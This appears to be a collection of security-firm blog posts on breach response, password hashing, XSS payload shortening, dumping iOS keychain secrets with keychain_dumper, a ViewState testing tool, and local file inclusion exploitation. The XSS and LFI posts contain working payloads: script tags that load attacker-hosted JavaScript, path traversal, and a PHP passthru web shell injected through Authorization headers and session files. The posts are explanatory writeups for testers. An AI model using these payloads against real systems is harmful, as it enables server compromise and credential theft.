What Kickstarter Did Right

Only a few details have emerged about the recent breach at Kickstarter, but it appears that this one will be a case study in doing things right both before and after the breach.

What Kickstarter has done right:

  • Timely notification
  • Clear messaging
  • Limited sensitive data retention
  • Proper password handling

Timely notification

The hours and days after a breach is discovered are incredibly hectic, and there will be powerful voices both attempting to delay public announcement and attempting to rush it. When users’ information may be at risk beyond the immediate breach, organizations should strive to make an announcement as soon as it will do more good than harm. An initial public announcement doesn’t have to have all the answers; it just needs to give users an idea of how they are affected and what they can do about it. While it may be tempting to wait for full details, an organization that shows transparency in the early stages of a developing story is going to have more credibility as it goes on.

Clear messaging

Kickstarter explained in clear terms what was and was not affected, and gave straightforward actions for users to follow as a result. The logging and access control groundwork for making these strong, clear statements at the time of a breach needs to be laid far in advance and thoroughly tested. Live penetration testing exercises with detailed post mortems can help companies decide if their systems will be able to capture this critical data.

Limited sensitive data retention

One of the first questions in any breach is “what did they get?”, and data handling policies in place before a breach are going to have a huge impact on the answer. Thinking far in advance about how we would like to be able to answer that question can be a driver for getting those policies in place. Kickstarter reported that they do not store full credit card numbers, a choice that is certainly saving them some headaches right now. Not all businesses have quite that luxury, but thinking in general about how to reduce the retention of sensitive data that’s not actively used can reduce both the cost of protecting it and the chance of exposure over the long term.

Proper password handling (mostly)

Kickstarter appears to have done a pretty good job in handling user passwords, though not perfect. Password reuse across different websites continues to be one of the most significant threats to users, and a breach like this can often lead to ripple effects against users if attackers are able to obtain account passwords.

In order to protect against this, user passwords should always be stored in a hashed form, a representation that allows a server to verify that a correct password has been provided without ever actually storing the plaintext password. Kickstarter reported that their “passwords were uniquely salted and digested with SHA-1 multiple times. More recent passwords are hashed with bcrypt.” When reading breach reports, the level of detail shared by the organization is often telling and these details show that Kickstarter did their homework beforehand.

A strong password hashing scheme must protect against the two main approaches that attackers can use: hash cracking, and rainbow tables. The details of these approaches have been well-covered elsewhere, so we can focus on what Kickstarter used to make their users’ hashes more resistant to these attacks.

To resist hash cracking, defenders want to massively increase the amount of work an attacker has to do to check each possible password. The problem with hash algorithms like SHA1 and MD5 is that they are too efficient; they were designed to be computed in as few CPU cycles as possible. We want the opposite from a password hash function, so that it is reasonable to check a few possible passwords in normal use but computationally ridiculous to try out large numbers of possible passwords during cracking. Kickstarter indicated that they used “multiple” iterations of the SHA1 hash, which multiplies the attacker effort required for each guess (so 5 iterations of hashing means 5 times more effort). Ideally we’d like to see a hashing attempt take at least 100 ms, which is a trivial delay during a legitimate login but makes large-scale hash cracking essentially infeasible. Unfortunately, SHA1 is so efficient that it would take more than 100,000 iterations to raise the effort to that level. While Kickstarter probably didn’t get to that level (it’s safe to assume they would have said so if they did), their use of multiple iterations of SHA1 is an improvement over many practices we see.

To resist rainbow tables, it is important to use a long, random, unique salt for each password. Salting passwords removes the ability of attackers to simply look up hashes in precomputed rainbow tables. Using a random, unique salt on each password also means that an attacker has to perform cracking on each password individually; even if two users have an identical password, it would be impossible to tell from the hashes. There’s no word yet on the length of the salt, but Kickstarter appears to have gotten the random and unique parts right.
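As a purely illustrative sketch (generic Python, not Kickstarter’s actual code, and iterated SHA-1 is shown only to explain the mechanics rather than as a recommendation), a salted, iterated scheme of the kind described might look like this:

import hashlib
import hmac
import os

ITERATIONS = 100000  # illustrative work factor; tune until one hash takes roughly 100 ms

def hash_password(password, salt=None, iterations=ITERATIONS):
    # A long, random, unique salt per password defeats precomputed rainbow tables
    if salt is None:
        salt = os.urandom(16)
    digest = salt + password.encode()
    # Iterating the hash multiplies the attacker's work for every guess
    for _ in range(iterations):
        digest = hashlib.sha1(digest).digest()
    return salt, digest

def verify_password(password, salt, expected_digest):
    _, candidate = hash_password(password, salt)
    # Constant-time comparison avoids leaking information through timing
    return hmac.compare_digest(candidate, expected_digest)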

Finally, Kickstarter’s move to bcrypt for more recent passwords is particularly encouraging. Bcrypt is a modern key derivation function specifically designed for storing password representations. It builds in the idea of strong unique salts and a scalable work factor, so that defenders can easily dial up the amount of computation required to test a password guess as computers get faster. Bcrypt and similar functions such as PBKDF2 and the newer scrypt (which adds memory requirements) are purpose-built to make it easy to get password handling right; they should be the go-to approach for all new development, and a high-priority change for any codebases still using MD5 or SHA1.
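For comparison, here is a minimal sketch using the bcrypt library for Python (again an illustration of the approach, not anyone’s production code); the salt and work factor are embedded in the stored hash, so there is nothing extra to manage:

import bcrypt

def hash_password(password):
    # gensalt() embeds a random salt and a tunable work factor in the result
    return bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12))

def verify_password(password, stored_hash):
    return bcrypt.checkpw(password.encode(), stored_hash)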

XSS Shortening Cheatsheet

By Ben Toews

In the course of a recent assessment of a web application, I ran into an interesting problem. I found XSS on a page, but the field was limited (yes, on the server side) to 20 characters. Of course I could demonstrate the problem to the client by injecting a simple <b>hello</b> into their page, but it leaves much more of an impression of severity when you can at least make an alert box.

My go-to line for testing XSS is always <script>alert(123123)</script>. It looks somewhat arbitrary, but I use it specifically because 123123 is easy to grep for and will rarely show up as a false positive (a quick Google search returns only 9 million pages containing the string 123123). It is also nice because it doesn’t require apostrophes.

This brings me to the problem. The above string is 30 characters long and I need to inject into a parameter that will only accept up to 20 characters. There are a few tricks for shortening your <script> tag, some more well known than others. Here are a few:

  • If you don’t specify a scheme section of the URL (http/https/whatever), the browser uses the current scheme. E.g. <script src='//btoe.ws/xss.js'></script>
  • If you don’t specify the host section of the URL, the browser uses the current host. This is only really valuable if you can upload a malicious JavaScript file to the server you are trying to get XSS on. E.g. <script src='evil.js'></script>
  • If you are including a JavaScript file from another domain, there is no reason why its extension must be .js. Pro-tip: you could even have the malicious JavaScript file be set as the index on your server… E.g. <script src='http://btoe.ws'>
  • If you are using IE you don’t need to close the <script> tag (although I haven’t tested this in years and don’t have a Windows box handy). E.g. <script src='http://btoe.ws/evil.js'>
  • You don’t need quotes around your src attribute. E.g. <script src=http://btoe.ws/evil.js></script>

In the best case (your victim is running IE and you can upload arbitrary files to the web root), it seems that all you would need is <script src=/>. That’s pretty impressive, weighing in at only 14 characters. Then again, when will you actually get to use that in the wild or on an assessment? More likely is that you will have to host your malicious code on another domain. I own btoe.ws, which is short, but not quite as handy as some of the five letter domain names. If you have one of those, the best you could do is <script src=ab.cd>. This is 18 characters and works in IE, but let’s assume that you want to be cross-platform and go with the 27 character option of <script src=ab.cd></script>. That’s still pretty short, but we are back over my 20 character limit.

Time to give up? I think not.

Another option is to forgo the <script> tag entirely. After all, ‘script’ is such a long word… There are many one letter HTML tags that accept event handlers. onclick and onkeyup are even pretty short. Here are a couple more tricks:

  • You can make up your own tags! E.g. <x onclick="alert(1)">foo</x>
  • If you don’t close your tag, some events will be inherited by the rest of the page following your injected code. E.g. <x onclick='alert(1)'>.
  • You don’t need to wrap your code in quotes. E.g. <b onclick=alert(1)>foo</b>
  • If the page already has some useful JavaScript (think jQuery) loaded, you can call their functions instead of your own. E.g. if they have a function defined as function a(){alert(1)} you can simply do <b onclick='a()'>foo</b>
  • While onclick and onkeyup are short when used with <b> or a custom tag, they aren’t going to fire without user interaction. The onload event of the <body> tag on the other hand will. I think that having duplicate <body> tags might not work on all browsers, though.  E.g. <body onload='alert(1)'>

Putting these tricks together, our optimal solution (assuming they have a one letter function defined that does exactly what we want) gives us <b onclick=a()>. Similar to the unrealistically good <script> tag example from above, this comes in at only 15 characters. A more realistic and useful line might be <b onclick=alert(1)>. This comes in at exactly 20 characters, which is within my limit.

This worked for me, but maybe 20 characters is too long for you. If you really have to be a minimalist, injecting the <b> tag into the page is the smallest thing I can think of that will affect the page without raising too many errors. Slightly more minimalistic than that would be to simply inject <. This would likely break the page, but it would at least be noticeable and would prove your point.

This article is by no means intended to provide the answer, but rather to ask a question. I ask, or dare I say challenge, you to find a better solution than what I have shown above. It is also worth noting that I tested most of this on recent versions of Firefox and Chrome, but no other browsers. I am using a Linux box and don’t have access to much else at the moment. If you know that some of the above code does not work in other browsers, please comment below and I will make an edit, but please don’t tell me what does and does not work in lynx.

If you want to see some of these in action, copy the following into a file and open it in your browser or go to http://mastahyeti.com/vps/shrtxss.html.

Edit: albinowax points out that onblur is shorter than onclick or onkeyup.


<html>
<head>
<title>xss example</title>
<script>
//my awesome js
function a(){alert(1)}
</script>
</head>
<body>

<!-- XSS Injected here -->
<x onclick=alert(1)>
<b onkeyup=alert(1)>
<x onclick=a()>
<b onkeyup=a()>
<body onload=a()>
<!-- End XSS Injection -->

<h1>XSS ROCKS</h1>
<p>click me</p>
<form>
<input value='try typing in here'>
</form>
</body>
</html>

PS: I did some Googling before writing this. Thanks to those at sla.ckers.org and at gnarlysec.

“Researchers steal iPhone passwords in 6 minutes”…true…but not the whole story

By Patrick Toomey

Direct link to keychaindumper (for those that want to skip the article and get straight to the code)

So, a few weeks ago a wave of articles hit the usual sites about research that came out of the Fraunhofer Institute (yes, the MP3 folks) regarding some issues found in Apple’s Keychain service. The vast majority of the articles, while factually accurate, didn’t quite present the full details of what the researchers found. What the researchers actually found was more nuanced than what was reported. But, before we get to what they actually found, let’s bring everyone up to speed on Apple’s keychain service.

Apple’s keychain service is a library/API provided by Apple that developers can use to store sensitive information on an iOS device “securely” (a similar service is provided in Mac OS X).  The idea is that instead of storing sensitive information in plaintext configuration files, developers can leverage the keychain service to have the operating system store sensitive information securely on their behalf.  We’ll get into what is meant by “securely” in a minute, but at a high level the keychain encrypts (using a unique per-device key that cannot be exported off of the device) data stored in the keychain database and attempts to restrict which applications can access the stored data.  Each application on an iOS device has a unique “application-identifier” that is cryptographically signed into the application before being submitted to the Apple App store.  The keychain service restricts which data an application can access based on this identifier.  By default, applications can only access data associated with their own application-identifier.  Apple realized this was a bit restrictive, so they also created another mechanism that can be used to share data between applications by using “keychain-access-groups”.  As an example, a developer could release two distinct applications (each with their own application-identifier) and assign each of them a shared access group.  When writing/reading data to the keychain a developer can specify which access group to use.  By default, when no access group is specified, the application will use the unique application-identifier as the access group (thus limiting access to the application itself).  Ok, so that should be all we need to know about the Keychain.  If you want to dig a little deeper Apple has a good doc here.

Ok, so we know the keychain is basically a protected storage facility that the iOS kernel delegates read/write privileges to based on the cryptographic signature of each application. These cryptographic signatures are known as “entitlements” in iOS parlance. Essentially, an application must have the correct entitlement to access a given item in the keychain. So, the most obvious way to go about attacking the keychain is to figure out a way to sign fake entitlements into an application (ok, patching the kernel would be another way to go, but that is a topic for another day). As an example, if we can sign our application with the “apple” access group then we would be able to access any keychain item stored using this access group. Hmmm…well, it just so happens that we can do exactly that with the “ldid” tool that is available in the Cydia repositories once you Jailbreak your iOS device. When a user jailbreaks their phone, the portion of the kernel responsible for validating cryptographic signatures is patched so that any signature will validate. So, ldid basically allows you to sign an application using a bogus signature. But, because it is technically signed, a Jailbroken device will honor the signature as if it were from Apple itself.

Based on the above description, so long as we can determine all of the access groups that were used to store items in a user’s keychain, we should be able to dump all of them, sign our own application to be a member of all of them using ldid, and then be allowed access to every single keychain item in a user’s keychain. So, how do we go about getting a list of all the access group entitlements we will need? Well, the keychain is nothing more than a SQLite database stored in:

/var/Keychains/keychain-2.db

And, it turns out, the access group is stored with each item that is stored in the keychain database.  We can get a complete list of these groups with the following query:

SELECT DISTINCT agrp FROM genp
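To make the idea concrete, here is a rough Python sketch (hypothetical code, not what keychain_dumper actually ships) that pulls the access groups out of the database and wraps them in a keychain-access-groups entitlements plist:

import sqlite3
from xml.sax.saxutils import escape

conn = sqlite3.connect('/var/Keychains/keychain-2.db')
groups = [row[0] for row in conn.execute('SELECT DISTINCT agrp FROM genp')]

# Emit a minimal entitlements plist listing every access group we found
print('<?xml version="1.0" encoding="UTF-8"?>')
print('<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">')
print('<plist version="1.0"><dict>')
print('  <key>keychain-access-groups</key>')
print('  <array>')
for group in groups:
    print('    <string>%s</string>' % escape(group))
print('  </array>')
print('</dict></plist>')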

Once we have a list of all the access groups we just need to create an XML file that contains all of these groups and then sign our own application with ldid.  So, I created a tool that does exactly that called keychain_dumper.  You can first get a properly formatted XML document with all the entitlements you will need by doing the following:

./keychain_dumper -e > /var/tmp/entitlements.xml

You can then sign all of these entitlements into keychain_dumper itself (please note the lack of a space between the flag and the path argument):

ldid -S/var/tmp/entitlements.xml keychain_dumper

After that, you can dump all of the entries within the keychain:

./keychain_dumper

If all of the above worked you will see numerous entries that look similar to the following:

Service: Dropbox
Account: remote
Entitlement Group: R96HGCUQ8V.*
Label: Generic
Field: data
Keychain Data: SenSiTive_PassWorD_Here

Ok, so what does any of this have to do with what was being reported on a few weeks ago?  We basically just showed that you can in fact dump all of the keychain items using a jailbroken iOS device.  Here is where the discussion is more nuanced than what was reported.  The steps we took above will only dump the entire keychain on devices that have no PIN set or are currently unlocked.  If you set a PIN on your device, lock the device, and rerun the above steps, you will find that some keychain data items are returned, while others are not.  You will find a number of entries now look like this:

Service: Dropbox
Account: remote
Entitlement Group: R96HGCUQ8V.*
Label: Generic
Field: data
Keychain Data: <Not Accessible>

This fundamental point was either glossed over or simply ignored in every single article I happened to come across (I’m sure at least one person will find the article that does mention this point :-)). This is an important point, as it completely reframes the discussion. The way it was reported, it looks like the point is to show how insecure iOS is. In reality the point should have been to show how security is all about trading off various factors (security, convenience, etc). This point was not lost on Apple, and the keychain allows developers to choose the appropriate level of security for their application. Stealing a small section from the keychain document from Apple, they allow six levels of access for a given keychain item:

CFTypeRef kSecAttrAccessibleWhenUnlocked;
CFTypeRef kSecAttrAccessibleAfterFirstUnlock;
CFTypeRef kSecAttrAccessibleAlways;
CFTypeRef kSecAttrAccessibleWhenUnlockedThisDeviceOnly;
CFTypeRef kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly;
CFTypeRef kSecAttrAccessibleAlwaysThisDeviceOnly;

The names are pretty self descriptive, but the main thing to focus in on is the “WhenUnlocked” accessibility constants.  If a developer chooses the “WhenUnlocked” constant then the keychain item is encrypted using a cryptographic key that is created using the user’s PIN as well as the per-device key mentioned above.  In other words, if a device is locked, the cryptographic key material does not exist on the phone to decrypt the related keychain item.  Thus, when the device is locked, keychain_dumper, despite having the correct entitlements, does not have the ability to access keychain items stored using the “WhenUnlocked” constant.  We won’t talk about the “ThisDeviceOnly” constant, but it is basically the most strict security constant available for a keychain item, as it prevents the items from being backed up through iTunes (see the Apple docs for more detail).

If a developer does not specify an accessibility constant, a keychain item will use “kSecAttrAccessibleWhenUnlocked”, which makes the item available only when the device is unlocked.  In other words, applications that store items in the keychain using the default security settings would not have been leaked using the approach used by Fraunhofer and/or keychain_dumper (I assume we are both just using the Keychain API as it is documented).  That said, quite a few items appear to be set with “kSecAttrAccessibleAlways”.  Such items include wireless access point passwords, MS Exchange passwords, etc.  So, what was Apple thinking; why does Apple let developers choose among all these options?  Well, let’s use some pretty typical use cases to think about it.  A user boots their phone and they expect their device to connect to their wireless access point without intervention.  I guess that requires that iOS be able to retrieve their access point’s password regardless of whether the device is locked or not.  How about MS Exchange?  Let’s say I lost my iPhone on the subway this morning.  Once I get to work I let the system administrator know and they proceed to initiate a remote wipe of my Exchange data.  Oh, right, my device would have to be able to login to the Exchange server, even when locked, for that to work.  So, Apple is left in the position of having to balance the privacy of user’s data with a number of use cases where less privacy is potentially worthwhile.  We can probably go through each keychain item and debate whether Apple chose the right accessibility constant for each service, but I think the main point still stands.

Wow…that turned out to be way longer than I thought it would be.  Anyway, if you want to grab the code for keychain_dumper to reproduce the above steps yourself you can grab the code on github.  I’ve included the source as well as a binary just in case you don’t want/have the developer tools on your machine.  Hopefully this tool will be useful for security professionals that are trying to evaluate whether an application has chosen the appropriate accessibility parameters during blackbox assessments. Oh, and if you want to read the original paper by Fraunhofer you can find that here.

ViewStateViewer: A GUI Tool for deserializing/reserializing ViewState

By: Patrick Toomey

Background

So, I was reading the usual blogs and came across a post by Mike Tracy from Matasano (Matasano has been having some technical difficulties…this link should work once they have recovered). In the blog post Mike talks about the development of a ViewState serializer/deserializer for his WWMD web application security assessment console (please see Mike’s original post for more details). Mike noted that the tools for viewing/manipulating ViewState from an application testing perspective are pretty weak, and I can’t agree more. There are a number of ViewState tools floating around that do a tolerable job of taking in a Base64 encoded ViewState string and presenting the user with a static view of the deserialized object. However, no tools up until this point, save for Mike’s new implementation, have allowed a user to change the values within the deserialized object and then reserialize them into a new Base64 string. Mike’s tool does exactly this, and is immensely useful for web application testing. The only downside to Mike’s tool is that it is built for his workflow and not mine (how can I fault the man for that?). So, I decided to build an equivalent that works well for me (and hopefully for you as well).

I tend to have a web proxy of some sort running on my machine throughout the day. There are tons of them out there and everyone seems to have their personal favorite. There is Paros, WebScarab, BurpSuite, and I am sure many others. In the last few months I have been using a newer entrant into the category, Fiddler.  Fiddler is a great web proxy whose only big drawback is that it is Windows only.  However, at least for me, the upsides to Fiddler tend to outweigh the negatives.  Fiddler has a fairly refined workflow (don’t get me started on WebScarab), is stable (don’t get me started on Paros), and is pretty extensible.  There are a number of ways to extend Fiddler, most trivially using their own FiddlerScript hooks.  In addition, there is a public API for extending the application using .NET.  Fiddler has a number of interfaces that can be extended to allow for inspecting and manipulating requests or responses. Please see the Fiddler site for more details on extending Fiddler using either FiddlerScript or .NET.  In particular, take a look at the development section to get a better feel for the facilities provided by Fiddler for extending the application.

Anyway, I had been thinking about writing a ViewState serializer/deserializer for Fiddler for the past month or two when I saw Mike’s blog post.  I decided that it was about time to set aside a little time and write some code.  I was lucky that Fiddler uses .NET, as I was able to leverage all of the system assemblies that Mike had to decompile in Reflector. After a bit of coding I ended up with my ViewStateViewer Fiddler inspector.  Let’s take a quick tour…

ViewStateViewer seamlessly integrates into the Fiddler workflow, allowing a user to manipulate ViewState just as they would any other variable in an HTTP request. An extremely common scenario for testing involves submitting a request in the browser, trapping the request in a proxy, changing a variable’s value, and forwarding the request on to the server. ViewStateViewer tries to integrate into this workflow as seamlessly as possible. Upon trapping a request that contains ViewState, ViewStateViewer extracts the Base64 encoded ViewState, Base64 decodes it, deserializes the ViewState, and allows a user to manipulate the ViewState as they would any other variable sent to the server. Let’s take a look at some screenshots to get a better idea of how this works.

ViewStateViewer Tour

Serialized ViewState

By default, Fiddler lets a user trap requests and view/edit a POST body before submitting the request to the server. In this case, the POST body contains serialized ViewState that we would like to work with. Without ViewStateViewer this is non-trivial, as Fiddler only shows us the Base64 encoded serialization.

Deserialized ViewState

ViewStateViewer adds a new “ViewState” tab within Fiddler that dynamically identifies and deserializes ViewState on the fly.  The top half of the inspector shows the original Base64 serialized ViewState string.  The bottom half of the inspector shows an XML representation of the deserialized ViewState.  In between these two views the user can see if the ViewState is MAC protected and the version of the ViewState being deserialized.  In this case we can see that this is .NET 2.X ViewState and that MAC protection is not enabled.

Reserialized ViewState

Once the ViewState is deserialized we can manipulate the ViewState by changing the values in the XML representation.  In this example we changed one of the string values to “foobar”, as can be seen in the figure above.  Once we change the value we can reserialize the ViewState using the “encode” button.  The reserialized Base64 encoded ViewState string can be seen in the top half of the ViewStateViewer window.  Once we have “encoded” the ViewState with our modifications, ViewStateViewer automatically updates the POST body with the new serialized ViewState string.  This request can now be “Run to Completion”, which lets Fiddler submit the updated request to the server.

Limitations

It should be noted that if the original ViewState had used MAC protection ViewStateViewer would not be able to reserialize the manipulated ViewState with a valid MAC.  While ViewStateViewer will not prevent you from deserializing, manipulating, and reserializing MAC protected ViewState, it will not be able to append a valid MAC to modified ViewState.  ViewStateViewer will warn us that “Modified ViewState does not contain a valid MAC”.  Modified requests made using reserialized MAC protected ViewState will ultimately fail, as we don’t know the machine key used to produce a valid MAC.  Regardless, sometimes simply being able to view what is being stored in MAC protected ViewState can be useful during an application assessment.

In addition to MAC protection, ViewState can be optionally protected using encryption.  Encryption will prevent any attempt by ViewStateViewer to deserialize the ViewState.  If encryption is detected ViewStateViewer will simply show the user the original Base64 ViewState string.  However, as any application security consultant can attest, there are many applications that do not encrypt or MAC protect their ViewState.  ViewStateViewer is aimed squarely at these use cases.

Finally, ViewStateViewer was written entirely with deserializing/serializing ViewState 2.X in mind. While ViewState 1.X is supported, the support at this time is limited, though completely functional. ViewState 1.X, unlike ViewState 2.X, Base64 decodes into a completely human readable ASCII based serialization format (think JSON).  As such, ViewStateViewer simply Base64 decodes ViewState 1.X and displays the result to the user. The user is then free to make any changes they wish to the decoded ViewState. This works exactly the same as the example shown above, except that the decoded ViewState object will not be a nicely formatted XML document. I might get around to adding true ViewState 1.X support, but the benefits would be purely cosmetic, as the current implementation has no functional limitations.
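If you are curious how the two formats can be distinguished in the first place, a small Python sketch (my own illustration; ViewStateViewer’s actual detection logic may differ) is enough: .NET 2.x ViewState produced by ObjectStateFormatter begins with the marker bytes 0xFF 0x01, while 1.x LosFormatter output decodes to readable text.

import base64

def guess_viewstate_version(b64_viewstate):
    raw = base64.b64decode(b64_viewstate)
    # ObjectStateFormatter (.NET 2.x) output starts with the bytes 0xFF 0x01
    if raw[:2] == b'\xff\x01':
        return '2.x (binary ObjectStateFormatter)'
    # LosFormatter (.NET 1.x) output is printable ASCII, e.g. 't<...>;'
    if raw[:1] == b't':
        return '1.x (text LosFormatter)'
    return 'unknown (possibly encrypted)'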

Wrap Up

ViewState is one of those areas that tends to be under-tested during application assessments, as there have been no good tools for efficiently evaluating the effects of modifying ViewState. Hopefully the release of ViewStateViewer will make evaluation of ViewState a more common practice. If you want to give ViewStateViewer a try you can download the Fiddler plugin (with source) here. Simply copy ViewStateViewer.dll into your “Inspectors” folder within your Fiddler install directory. It should be noted that this inspector is for Fiddler2, so please update your copy of Fiddler if you are out of date. Finally, this is very much a work in progress. As I found out during development, there is a ton of ViewState out there that is either non-trivial or outright impossible to deserialize/reserialize (non-standard objects being serialized, for example). Maybe I’ll detail some of these difficult or impossible edge cases in a subsequent post. So, while I have done some limited testing, I am sure there are some bugs that will crop up. If you happen to find one please don’t hesitate to contact me.

Local File Inclusion – Tricks of the Trade

By: Cris Neckar, Andrew Case

Everyone understands that local file includes are bad. The ability to execute an arbitrary file as code is unquestionably a security risk and should be protected against. However, the process of exploitation can be rather involved and is commonly misunderstood. In this post I want to clarify the risks involved in this type of vulnerability and the complications involved in exploitation.

To start, let’s give a bit of background. I will focus on PHP on Linux specifically but this class of vulnerability may also exist in many other interpreted languages on different platforms. Generically, a file inclusion vulnerability is the dynamic execution of interpreted code loaded from a file. This file could be loaded remotely from an http/ftp server in the case of remote inclusions, or, as I will cover, locally from disk. Generally remote file inclusion vulnerabilities are trivial to exploit so I will not be covering them. The following line is an example of a local file inclusion vulnerability in PHP:

require_once($LANG_PATH . '/' . $_GET['lang'] . '.php');

In this case an attacker controls the “lang” variable and can thereby force the application to execute an arbitrary file as code. The attacker does not however control the beginning of the require_once() argument, so including a remote file would not be possible. To exploit this an attacker would set the ‘lang’ variable to a value similar to the following:

lang=../../../../../../file/for/inclusion%00

Before we get into discussing the exploitation of this type of vulnerability let me say a few words about preventing them. In the preceding case, the vulnerability could be trivially mitigated through input validation. A simple check for non-alphanumeric characters would suffice in this case. However, where possible I would recommend completely avoiding user input for this type of logic and instead selecting the proper include from a hardcoded list of known good files based on a user supplied index number or hash.

Now that we know how to avoid these when developing applications, let’s get back to methods of exploitation. A straightforward vulnerability such as this one can in fact be quite difficult to reliably exploit given the differences in deployment platforms. When developing an exploit the first question to ask yourself is generally “what do I need for successful exploitation?”. In this case, the answer to that question is a file stored locally on the target system which contains PHP code that accomplishes our goal. In the best case we will be able to include a file which we directly control the contents of.

This can be an interesting puzzle as it is almost a chicken-and-egg problem. To gain access to the remote system we need the ability to create a file on the remote system. The first possibility, and by far the simplest, is to look at the features provided by the application we are attacking. For example, many local inclusion exploits use features such as custom avatars and file storage mechanisms to place code on the target system. Bypassing various checks performed on these types of files/images can be an interesting puzzle in itself and the details are best saved for a future post. However, we want to talk about these vulnerabilities on systems which do not allow such trivial exploitation.

If the target application does not provide some way of uploading or changing a file on disk we need to examine other options. I suggest examining all access to the target server. Ask yourself “What services are available to me and what files do they access? Do I control any of the data written to these files?”. An anonymous FTP server or similar would certainly make life easier here but that would be too good to be true. :)

Generally when people discuss local includes the assumption is that the target file will be the HTTP server’s logs. It is quite easy to influence the contents of log files as their purpose is to store the requests that you, the user, make. Most people will suggest the logs and conveniently gloss over the complexities that their usage presents. There are several major potential hurdles in the use of logs.

First we run into the problem of finding the logs. In a production environment it is rare to use default paths for log data; ‘/var/log/httpd/access_log’ is simple enough to guess, but what do you do when the log is stored in ‘/vol001/appname.ourwidget.com/log’? Guessing this path would be non-trivial at best, and even assuming that verbose error messages or a similar information disclosure gives you some hint of the directory structure, using these methods in a reliable exploit would be extremely difficult.

To jump this hurdle let’s examine an interesting feature of the Linux proc file-system, namely, the ‘self’ link. The Linux kernel exports a good bit of interesting information about individual processes to usermode through the proc entries for each process id. It also creates an entry called ‘self’ which provides a process easy access to its own process information. When we access /proc/self through the context of a PHP include the link will, in most cases, point to the process entry for the httpd child which has instantiated the PHP interpreter library (this may not be the case if the interpreter has been called as CGI). Often when an HTTPd is run, the path to its configuration file is passed as an argument. If this is the case, finding the log file is a simple procedure of including ‘/proc/self/cmdline’, reading the location of the configuration file and including it to find the path to log files.
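Tied back to our vulnerable ‘lang’ parameter, that inclusion might look something like the following (illustrative only):

lang=../../../../../../proc/self/cmdline%00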

Viewing the apache cmdline proc entry

If the ‘cmdline’ entry does not contain the configuration file there is another option. The per process proc entry also contains a directory entry called ‘fd’. This directory exports a numbered entry for each file descriptor that the process currently holds. In writing PoC for this post on a 2.6.20 kernel we noticed that at some point a kernel developer had the foresight to set the permissions on these entries so that they could be read only by the instantiating user. We tasked intern Y with finding the change and, after grepping the diffs of every kernel release (ever… i.e. wget -r --no-parent http://www.kernel.org/pub/linux/kernel/) he found the following. In May of 2007 the following patch was entered to address the case where a process opens a file and then drops its permissions (interestingly, that is exactly what Apache does).

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=8948e11f450e6189a79e47d6051c3d5a0b98e3f3

This change was committed around the release of version 2.6.22. Using this new access we are able to directly access the files opened by the apache process through these proc entries. By iterating the file name from ‘0’ we are able to directly access the HTTPd log file which will undoubtedly be open for use by the web server. Simply include the files ‘/proc/self/fd/<fd number>’ until you hit on the right file descriptor.

Using the fd proc entries to access apache logs

Great, so we found the log file. Now we need to determine what fields we actually control. It is commonly believed that you can arbitrarily enter text into apache logs by putting code into GET variables or the requested path. This is generally not the case as these values will almost always be URL encoded and will therefore not execute correctly. I find the simplest field to use is actually the user name. This is pulled from the Authorization header which is typically base64 encoded and thereby avoids the URL encoding mechanisms. By base64 encoding a string similar to the following:

<?php passthru($_GET['cmd']); ?>:doesn't matter

And specifying an Authorization header as follows:

Authorization: Basic PD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTsgPz46ZG9lc24ndCBtYXR0ZXI=

We can insert arbitrary code into the HTTP logs.
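If you would rather generate that header value yourself than copy it, the encoding step is plain Base64; a quick illustrative Python snippet:

import base64

payload = b"<?php passthru($_GET['cmd']); ?>:doesn't matter"
print('Authorization: Basic ' + base64.b64encode(payload).decode())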

PHP code as basic auth username

Assuming the stars align and this method is successful there is still one more caveat. On production HTTP servers the log files tend to be rather large, often in the range of 200 MB. Your PHP code is going to be at the very end of the current log file, which likely means that for each command you run you will wait a long time (depending on connection speed) for the page to display the output of your command. It is possible to use the error_log instead, as it is likely somewhat smaller, but these files can still be rather larger than we would hope.

We now have somewhat reliable ways to get code execution, but I hear you saying “There must be a better way”. I am going to present a method which is specific to PHP and somewhat specific to the target application. This is a very common scenario but if it does not fit your needs I hope that it will at least help you to get into the right mindset for this type of exploit development.

PHP provides a mechanism for maintaining session state across requests. Many other languages provide similar interfaces but their internals are sometimes quite different. In the case of PHP a session is started using, logically enough, session_start(). This code can be found in ‘/ext/session/session.c’ within the PHP codebase. Briefly, it checks whether a session cookie was sent with the current request; if not, it creates a random session id and sets the cookie within the response to the user. It also registers the global $_SESSION variable which is directly tied to a file stored in the temporary directory. This file will contain any variables set under the session context formatted as a PHP array.

In the case of an application which tracks session information, any setting stored as a string which the user controls could provide an excellent target for a local file include vulnerability. The session file will be named ‘sess_<session_id>’. Although the session_id is a random hash it is trivial to retrieve as it is stored locally in a cookie.

Viewing the PHP session cookie

In our simple example, our session has a few variables but the simplest to control arbitrarily is a field called ‘signature’. PHP applications tend to store all sorts of interesting things in session variables and there is often a string that you control arbitrarily. In this case by setting our ‘signature’ to PHP code we can gain command execution through this session file.
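With PHP’s default ‘php’ serialize handler, the poisoned session file (sess_<session_id> in the temporary directory) would then contain something along these lines (an illustrative example):

username|s:5:"admin";signature|s:32:"<?php passthru($_GET['cmd']); ?>";

Including that file through the vulnerable parameter executes the embedded PHP.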

Putting it all together

Although the specific methods I have outlined here will not always work in your particular situation I hope that I have at least prompted some interest in the many possibilities for exploiting this type of vulnerability. Regardless of how limited you feel by the platform you are exploiting there is almost always some trick that you can use to get the better of the system.

Weak Application Security = Non-Compliance

I had to post about this one – our general counsel and compliance specialist Dave Stampley wrote an article recently at Information Week about the importance of ensuring application security as part of your regulatory compliance efforts. From the article:

Web-application security vulnerabilities pose a unique compliance risk for companies. Unlike compliance failures that take place in the background–for example, an unencrypted business-to-business transmission of sensitive consumer data–application weaknesses are open to discovery by any skilled Web surfer and even consumers themselves.

“The FTC appears to be taking a strict liability approach to E-commerce security flaws,” says Mary Ellen Callahan, an attorney at Hogan & Hartson in Washington, D.C., who has represented clients facing government privacy compliance investigations. “White-hat hackers and tipsters have prompted a number of enforcement actions by reporting Web-site flaws they discovered.”

Read the full article here